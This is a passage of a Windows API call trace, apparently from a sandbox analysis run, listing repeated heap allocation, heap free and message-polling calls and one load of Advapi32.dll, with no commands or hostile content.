[0119.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0119.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0119.982] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0119.982] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0119.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a58 [0119.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a58 | out: hHeap=0x12c0000) returned 1 [0119.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b58 [0119.983] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b58 | out: hHeap=0x12c0000) returned 1 [0119.983] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0119.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a78 [0119.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a78 | out: hHeap=0x12c0000) returned 1 [0119.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0119.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f98 [0119.983] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f98 | out: hHeap=0x12c0000) returned 1 [0119.983] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.021] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0120.021] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0120.021] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491838 [0120.021] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491838 | out: hHeap=0x12c0000) returned 1 [0120.021] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0120.022] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0120.022] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458958 [0120.022] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.022] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458958 | out: hHeap=0x12c0000) returned 1 [0120.022] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.022] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0120.022] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0120.022] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0120.022] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0120.022] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0120.022] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0120.022] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b58 [0120.022] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.022] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b58 | out: hHeap=0x12c0000) returned 1 [0120.022] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.022] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0120.022] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7c0 [0120.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918b8 [0120.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0120.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7c0 | out: hHeap=0x12c0000) returned 1 [0120.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0120.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0120.023] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0120.023] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0120.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0120.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0120.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0120.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0120.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0120.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d58 [0120.023] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d58 | out: hHeap=0x12c0000) returned 1 [0120.023] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0120.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0120.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0120.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ab8 | out: hHeap=0x12c0000) returned 1 [0120.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0120.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0120.023] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0120.023] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.023] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0120.024] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0120.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0120.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0120.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0120.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0120.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0120.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0120.024] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0120.024] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0120.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7c0 [0120.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a78 [0120.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a78 | out: hHeap=0x12c0000) returned 1 [0120.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7c0 | out: hHeap=0x12c0000) returned 1 [0120.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0120.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0120.024] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.024] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0120.024] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0120.024] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0120.025] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a38 [0120.025] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0120.025] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0120.025] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0120.025] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b58 [0120.025] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.025] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b58 | out: hHeap=0x12c0000) returned 1 [0120.025] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.025] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0120.025] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0120.025] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0120.025] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0120.025] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0120.025] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0120.025] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0120.025] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.025] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0120.025] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.025] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.025] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff208 [0120.025] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0120.025] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0120.025] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0120.026] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0120.026] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0120.026] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef590 [0120.026] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0120.026] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0120.026] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0120.026] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0120.026] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0120.026] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.026] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0120.026] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0120.026] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0120.026] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0120.026] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0120.026] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0120.026] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0120.026] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.026] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0120.026] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.026] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0120.026] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0120.027] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491838 | out: hHeap=0x12c0000) returned 1 [0120.027] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.027] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77820000 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.027] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.028] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.029] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.029] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.029] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.029] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.029] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.029] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.029] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0120.029] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 